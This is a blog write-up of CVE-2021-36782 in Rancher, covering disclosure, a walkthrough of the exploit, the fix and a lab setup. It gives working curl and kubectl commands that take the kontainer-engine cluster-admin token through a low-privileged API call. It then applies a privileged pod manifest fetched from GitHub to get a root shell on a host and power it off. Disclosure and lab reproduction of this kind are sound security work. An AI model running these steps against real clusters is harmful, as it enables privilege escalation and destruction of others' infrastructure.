Write-up of CVE-2021-36782: Exposure of credentials in Rancher API

A write-up of CVE-2021-36782. This vulnerability exposes the ServiceAccountToken of Rancher's kontainer-engine, which can be used for privilege escalation.

It has been a while since the last post on my blog. In April 2022, I found an issue in Rancher, the software used to provision and manage Kubernetes clusters. A patched version has now been out for four months, so I wanted to do a little write-up. Don't follow along on a production cluster. At the bottom of this post, I describe an easy way to launch a Rancher cluster with Terraform so you can follow along safely.

Summary

The issue exposed an important Kubernetes ServiceAccountToken to low-privileged users. The exposed token can access downstream clusters as admin. The vulnerability is rated critical with a CVSS score of 9.9, and Rancher published it under this security advisory. On 7 April 2022, I sent a responsible disclosure of this issue, including a proof of concept, to Rancher. They confirmed receipt 45 minutes later, and about 13 hours later they confirmed the issue and started working on a fix, which was very quick:

> Hi Marco.
>
> Thank you once again for reporting this issue directly to us and for the excellent PoC. This helped us to quickly evaluate and confirm the issue, which affects Rancher versions 2.6.4 and 2.5.12.
>
> We started working on a fix and will release in the upcoming versions of Rancher. It will not be publicly announced until all supported Rancher versions are patched. We will communicate to you in advance before we release the latest fixed version.
>
> Please let us know if you have any questions.
>
> Thanks,

Rancher kept me up to date on the fix as it progressed. On 19 August 2022, Rancher released the patched version 2.6.7.

In this blog post, I want to explain the vulnerability as best I can while providing a way to follow along.

The service account

Rancher uses Kubernetes service accounts to access other clusters. There are two relevant service accounts I want to talk about.

The first one is the Rancher user's token. A user created in Rancher gets a service account bound to the specific roles granted on a particular cluster. Because it's bound to those roles, its privileges are limited to what they allow.



For demonstration, I've created a user named "readonlyuser", and this is what it can do:

This user has Rancher's predefined role "view workloads" in the project "extraproject". Only one namespace, "foo", is currently assigned to this project, so the user has almost no access and therefore sees very few objects in the Rancher dashboard.

The user relies on its service account token for this access. Because a Rancher user's API calls are normally proxied through Rancher's cluster router, the user doesn't see this token. It does become visible when you download the kubeconfig file from the UI.

Rancher also uses a service account token for its kontainer-engine to manage the downstream clusters and gets this token from the API, as can be seen here:

This service account is just like the user's service account but is bound to the cluster-admin role and shouldn't be available to regular users.

Accessing Rancher's service account token

The Rancher dashboard renders its views with JavaScript, using API calls made from the browser. You can see this when you log into the dashboard and open the browser's developer console. Forms and lists are generated dynamically from schemas. For example, when you open Rancher's workloads view, the browser calls the Kubernetes API and populates the view with the returned data.

One of these API calls is /v1/management.cattle.io.clusters, which returns information about the clusters the user can see. You can investigate it by opening this API path in the browser or by requesting the information directly with curl.

```shell
BASEURL="https://rancher.1...4.sslip.io"

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -H 'Content-Type: application/json' \
  -d '{"description":"UI session",
       "responseType":"token",
       "username":"readonlyuser",
       "password":"readonlyuserreadonlyuser"}' \
  "${BASEURL}/v3-public/localProviders/local?action=login" \
  | jq -r '.token')

curl -s -k -XGET \
  -H "Authorization: Bearer $TOKEN" \
  "${BASEURL}/v1/management.cattle.io.clusters" \
  | jq '.data[] | select(.spec.displayName=="extra-cluster") | .status'
```

The service account token you receive in the status.serviceAccountToken field of this object is not the user's token but the kontainer-engine's token. If we decode the JWT, we get the following result.

```json
{
  "iss": "kubernetes/serviceaccount",
  "kubernetes.io/serviceaccount/namespace": "cattle-system",
  "kubernetes.io/serviceaccount/secret.name": "kontainer-engine-token-tpjsr",
  "kubernetes.io/serviceaccount/service-account.name": "kontainer-engine",
  "kubernetes.io/serviceaccount/service-account.uid": "232e5218-9248-4129-88e0-4ff9d9969271",
  "sub": "system:serviceaccount:cattle-system:kontainer-engine"
}
```

Decoded JWT token

This shows that the subject of this token is kontainer-engine, and it lives in the cattle-system namespace.
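To reproduce the decoding step yourself, a small shell helper is enough. This is a minimal sketch that assumes bash and GNU coreutils `base64`; the function name `jwt_payload` is my own and not part of any Rancher tooling. It only base64url-decodes the middle segment of the token and does not verify the signature, which is all we need to read the claims.

```shell
# Hypothetical helper: print the decoded claims of a JWT such as the
# kontainer-engine token. Only the payload segment is decoded; the
# signature is NOT verified. Assumes bash and GNU coreutils base64.
jwt_payload() {
  local token="$1"
  local payload

  # A JWT is header.payload.signature: keep only the middle segment.
  payload="${token#*.}"
  payload="${payload%%.*}"

  # JWTs use unpadded base64url: map '_' and '-' back to '/' and '+'.
  payload=$(printf '%s' "$payload" | tr '_-' '/+')

  # Restore the '=' padding so the length is a multiple of 4.
  case $(( ${#payload} % 4 )) in
    2) payload="${payload}==" ;;
    3) payload="${payload}=" ;;
  esac

  printf '%s' "$payload" | base64 -d
}
```

For example, `jwt_payload "$JWT" | jq .` pretty-prints the claims, where `JWT` is a hypothetical variable holding the value of status.serviceAccountToken.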

Using the JWT token

To use this JWT, we need direct network access to the downstream cluster's Kubernetes API server, because the Rancher proxy does not accept this token. We can find the Kubernetes API endpoint in the browser or query the same Rancher API with curl.

```shell
BASEURL="https://rancher.1...4.sslip.io"

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -H 'Content-Type: application/json' \
  -d '{"description":"UI session",
       "responseType":"token",
       "username":"readonlyuser",
       "password":"readonlyuserreadonlyuser"}' \
  "${BASEURL}/v3-public/localProviders/local?action=login" \
  | jq -r '.token')

# Fetch the API endpoint of the downstream cluster
curl -s -k -XGET \
  -H "Authorization: Bearer $TOKEN" \
  "${BASEURL}/v1/management.cattle.io.clusters" \
  | jq -r '.data[] | select(.spec.displayName=="extra-cluster2") | .status.apiEndpoint'

# Example response: https://1...2:6443
```

Fetching the downstream Kubernetes API endpoint

The endpoint is different from the base URL and typically ends in port 6443. If the downstream cluster can't be reached directly, for example because a firewall blocks it, you need to continue from the Rancher-provided shell in the top-right corner of the UI. Note that you'll need to download a precompiled curl binary there.
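Before switching to the UI shell, you can check whether the endpoint is reachable from your own machine. The helper below is a hypothetical sketch (the name `api_reachable` and the timeout values are my own choices) that requests the API server's `/version` path with curl. Any HTTP response, including 401 or 403, means the network path is open; only a connection failure or timeout counts as unreachable.

```shell
# Hypothetical helper: succeed if the kube-apiserver at $1 answers at all.
# Without -f, curl exits 0 on any HTTP response (401/403 included) and
# non-zero on connection errors or timeouts. -k skips TLS verification,
# like the other commands in this post.
api_reachable() {
  local endpoint="$1"
  curl -s -k -o /dev/null \
    --connect-timeout 5 --max-time 10 \
    "${endpoint}/version"
}
```

For example, `api_reachable "$ENDPOINT" || echo "not reachable, use the Rancher UI shell"`, where `ENDPOINT` is a hypothetical variable holding the value returned by the previous command.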

You can continue using curl calls or set up kubectl to access the cluster. I will do the first call using curl, then set up kubectl to show both ways.

When requesting the ClusterRoleBindings for system:serviceaccount:cattle-system:kontainer-engine, we see that this service account is bound to the cluster-admin ClusterRole.

```shell
TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6IlNkZ2h2QkxHMUR5cVIyV1BUYlNaMUFEcDg5UmNBQ3lxYlRhOWpwNGhHckEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tdHBqc3IiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjIzMmU1MjE4LTkyNDgtNDEyOS04OGUwLTRmZjlkOTk2OTI3MSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.C57WQ-tzUBce3R1Dfs7KU3KueTLor_D4MqAsQIwp9udxjORin-zmFCJXHyTysQI8d1ocisSnJE-ZNb-PvjzixGzDIvZcjA0a2YvFqA4Tmc5yyC4VzM_nZgrY8M5yBxTTdIZNoka9qCdpdavL9U4UuYvGDS5HXQ4_K-eSGb95VoIgzH355acjZEN6yv_d4fXyoqIYahAiwmlnWvFALQOqOoCzYrmHst-HoFI1AmXE_N4PZRVYaOoAlBia0Q2Fcl808arx9iGqi7UdKjfhqurb5-Aws8XNxrrMZoOCJYPu40NEjkX5yr517oCxk1I2frfUeO5jTxhexyqImzoOcl4TYA"

# .subjects[]? tolerates bindings without subjects; any() prints each match once
curl -s -k -X GET -H "Authorization: Bearer $TOKEN" \
  https://--:6443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  | jq '.items[] | select(any(.subjects[]?; .name=="kontainer-engine"))'
```

```json
{
  "metadata": {
    "name": "system-netes-default-clusterRoleBinding",
    "uid": "cb0a6201-6c70-4186-ac82-97761169859a",
    "resourceVersion": "803",
    "creationTimestamp": "2022-11-24T20:21:08Z",
    "managedFields": [
      {
        "manager": "Go-http-client",
        "operation": "Update",
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "time": "2022-11-24T20:21:08Z",
        "fieldsType": "FieldsV1",
        "fieldsV1": {
          "f:roleRef": {},
          "f:subjects": {}
        }
      }
    ]
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "kontainer-engine",
      "namespace": "cattle-system"
    }
  ],
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "cluster-admin"
  }
}
```

Accessing the cluster role bindings with the kontainer-engine's JWT token



Service accounts bound to the cluster-admin cluster role have super-user access to the Kubernetes cluster. Therefore, we can do anything we want to the cluster with this token. Let's put it in a kubeconfig file.

```shell
# The JWT token
token=eyJhbGciOiJSUzI1NiIsImtpZCI6IklvbXVOckJ1eFZrRVNZUDNXRnlndWNSbFpzRndIWjlKQnJkOFdDUG5ybFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tcTY0eDUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImNjM2QyNGVjLWI0MjItNGJmYy04M2U0LWE5ODJmOTRlYjJhOSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.ApVZZ9EEo7bqUeEpHdVqEklWL8GPN4fVfRwH0LtTm6lRsrQFnYVpus2VrjyeqoVTnrzEetsYZyWEiv0KODw3HYgePW_XbrrCqKSi3Aca6-sA5sJP28A4QWkUVH_6y-6nS53w24pdk77l-4YxXLIYTUilipe9JaXpzBrER5OsCNjweNILfmC5LHlRAtpvNVh7vahZsAxcDdDBzwpWuKubDz_3yRiHNH8nC-x40SJz90Xi771w7Aw7qvAvodX-5efVFHuzNw0Q4Qjcpj6RcV2I-rKGy5ORYgrXcNrXgPWZSpO8MU8iupS5XpW2SH9pgQI6Xe2QuyySia6I71ZkagsYWw

# Use a different kubeconfig file
export KUBECONFIG=~/kubeconfig-extra-cluster2

kubectl config set-cluster extra-cluster2 \
  --server=https://1...2:6443 \
  --insecure-skip-tls-verify=true

kubectl config set-credentials extra-cluster2-admin \
  --token="$token"

kubectl config set-context extra-cluster2 \
  --user=extra-cluster2-admin \
  --cluster=extra-cluster2

kubectl config use-context extra-cluster2

kubectl auth can-i --list
```

Configuring the kubectl config

Running the above commands shows the following output.

This essentially means unrestricted access. As a bonus, let's get a root shell on one of the hosts and power it off, since we don't need this cluster anymore anyway.



```shell
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
> pod/everything-allowed-exec-pod created

kubectl exec -it everything-allowed-exec-pod -- chroot /host bash
> root@marco-test-extra-node3:/# id
> uid=0(root) gid=0(root) groups=0(root)
> root@marco-test-extra-node3:/# poweroff
```

Powering off one of the nodes

The new way

It's clear this token shouldn't be exposed to regular users. That's why the serviceAccountToken status field is being replaced by the serviceAccountTokenSecret field, which refers to a secret holding the token instead of containing the token itself. Reading that secret requires a separate privilege, which regular users don't have.

This change can be seen in the following commit.

After upgrading Rancher to 2.6.7, the token's value disappears and the new serviceAccountTokenSecret field appears.
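To see for which clusters a user can still read a raw token, you can filter the same /v1/management.cattle.io.clusters response used earlier. The sketch below is a hypothetical helper (`exposed_token_clusters` is my own name) that, like the rest of this post, requires jq. It prints the display name of every cluster whose status holds a non-empty serviceAccountToken; on a patched Rancher I would expect it to print nothing.

```shell
# Hypothetical helper: read a /v1/management.cattle.io.clusters response on
# stdin and print the display name of every cluster whose status still holds
# a non-empty serviceAccountToken. A missing or null field counts as empty.
# Requires jq.
exposed_token_clusters() {
  jq -r '.data[]
         | select((.status.serviceAccountToken // "") != "")
         | .spec.displayName'
}
```

Usage, reusing `BASEURL` and the user's `TOKEN` from the earlier commands: `curl -s -k -H "Authorization: Bearer $TOKEN" "${BASEURL}/v1/management.cattle.io.clusters" | exposed_token_clusters`.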

Reproducing the issue

Reading can be boring, so I wrote this post with following along in mind. The exploit is very simple and therefore easy to reproduce. I provide a Terraform module that quickly sets up a vulnerable Rancher cluster. You can find it here. It works on DigitalOcean, and the only thing you should need to fill in is your API key.

To reproduce the issue, let's spin up a new Kubernetes cluster and a Rancher instance running version 2.6.6. Clone the git repository linked above to your local Linux machine and make sure you have Terraform installed. I've used versions 1.1.6 and 1.3.5 and both worked, so the exact Terraform version shouldn't matter much.
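Before you start, you may want to confirm that the deployed Rancher version is in the affected range. The function below is a rough sketch under stated assumptions. From this post, 2.6.7 is the fixed 2.6 release, and 2.6.4, 2.6.6, and 2.5.12 are affected. That the 2.5 line was fixed in 2.5.16, and that every earlier patch release in both lines is affected, are my assumptions, so check the advisory before relying on the result. The name `cve_2021_36782_status` is hypothetical; other release lines and non-numeric versions are reported as unknown.

```shell
# Rough sketch: classify a Rancher version for CVE-2021-36782.
# From this post: 2.6.7 is the fixed 2.6 release.
# ASSUMPTIONS: the 2.5 line was fixed in 2.5.16, and all earlier patch
# releases in both lines are affected. Verify against the advisory.
cve_2021_36782_status() {
  local version="${1#v}"   # accept "v2.6.6" as well as "2.6.6"
  local major minor patch rest fixed_patch
  # "rest" absorbs any extra dot-separated components.
  IFS=. read -r major minor patch rest <<< "$version"

  # Only plain numeric X.Y.Z versions are handled.
  case "$patch" in
    '' | *[!0-9]*) echo unknown; return ;;
  esac

  case "${major}.${minor}" in
    2.6) fixed_patch=7 ;;
    2.5) fixed_patch=16 ;;   # assumption, see above
    *)   echo unknown; return ;;
  esac

  if [ "$patch" -lt "$fixed_patch" ]; then
    echo affected
  else
    echo fixed
  fi
}
```

For example, `cve_2021_36782_status 2.6.6` prints `affected`, and `cve_2021_36782_status v2.6.7` prints `fixed`.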

Conclusion

This vulnerability has two sides. On the one hand, an attacker still needs access to Rancher in the first place. On the other hand, privileges that can be escalated this easily make the insider threat considerably worse.

In projects as big as Rancher, a single change can open doors that were never supposed to be opened, and such a door can stay open for a very long time before someone notices.

This was a great experience, from discovery to exploitation. I understand the gravity of the issue, but it was thrilling.

Thanks to Rancher for the great open-source tool, Guilherme from Rancher for the quick response to the issue and for keeping me updated, and my colleague Mike for checking and confirming the discovery and figuring out a way to bypass the firewall using the UI shell.